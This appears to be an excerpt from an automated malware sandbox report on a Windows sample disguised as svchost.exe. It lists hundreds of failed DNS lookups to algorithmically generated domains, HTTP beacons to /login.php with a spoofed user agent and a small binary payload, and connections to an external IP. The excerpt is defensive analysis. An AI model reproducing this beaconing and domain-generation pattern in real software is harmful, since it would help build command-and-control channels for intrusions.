      Source: unknownDNS traffic detected: query: gatycyb.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqycos.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowygem.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqypew.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekyhil.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahyfow.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegylep.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetyvep.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahynaz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexykaq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygyfir.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacycus.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumycug.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganyriz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galycuw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygynud.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofymem.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebyfav.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxywer.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykysix.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojycif.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymyjon.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegyxug.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocypyt.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvygyq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebyqil.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvydov.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumyliq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujyteq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopydum.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galyros.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekykev.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujymel.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedyfog.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymytar.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumytol.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebykul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocyruk.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvyjyr.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetynev.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxygud.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetysuq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyrywax.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopydek.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykyjad.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygyged.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegyfil.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahyraw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygymoj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygymyn.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyryfox.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvywup.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganynyb.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galykes.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojypuc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocykif.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvytag.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopycyf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganykuw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvywav.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufyxug.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedykiv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygylax.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysyger.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexylal.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekylag.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvynen.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvywux.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegyqug.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volyquk.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygyfex.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzydal.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganyfes.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysyjid.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofyzym.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekyqop.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvysur.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadydas.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysyfin.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volycik.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonykuk.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxylux.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojydam.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufybop.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonyrot.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzywuq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygytyd.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopybok.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedyleq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volybec.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocybam.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumydoq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volyjok.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqydus.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvyjyl.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymysan.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofydut.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygyxun.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojymet.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofybic.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahydoh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocyjet.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyryvur.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufylap.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadykos.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvylyg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekytyq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganyzub.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvypul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykyfen.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofyref.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopypec.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatypub.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxymin.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
      Source: unknownNetwork traffic detected: HTTP traffic on port 51116 -> 8001
      Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 51116
      Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 51116
      Source: unknownNetwork traffic detected: HTTP traffic on port 51119 -> 8001
      Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 51119
      Source: unknownNetwork traffic detected: HTTP traffic on port 64294 -> 8001
      Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 64294
      Source: unknownNetwork traffic detected: HTTP traffic on port 64295 -> 8001
      Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 64295
      Source: unknownNetwork traffic detected: DNS query count 1004
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D34AF0 IsUserAnAdmin,IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,1_2_02D34AF0
      Source: global trafficTCP traffic: 192.168.2.4:51116 -> 106.15.137.66:8001
      Source: global trafficDNS traffic detected: number of DNS queries: 1004
      Source: Joe Sandbox ViewIP Address: 3.94.10.34 3.94.10.34
      Source: Joe Sandbox ViewIP Address: 64.190.63.136 64.190.63.136
      Source: Joe Sandbox ViewIP Address: 64.190.63.136 64.190.63.136
      Source: Joe Sandbox ViewIP Address: 15.197.240.20 15.197.240.20
      Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
      Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
      Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
      Source: Joe Sandbox ViewASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
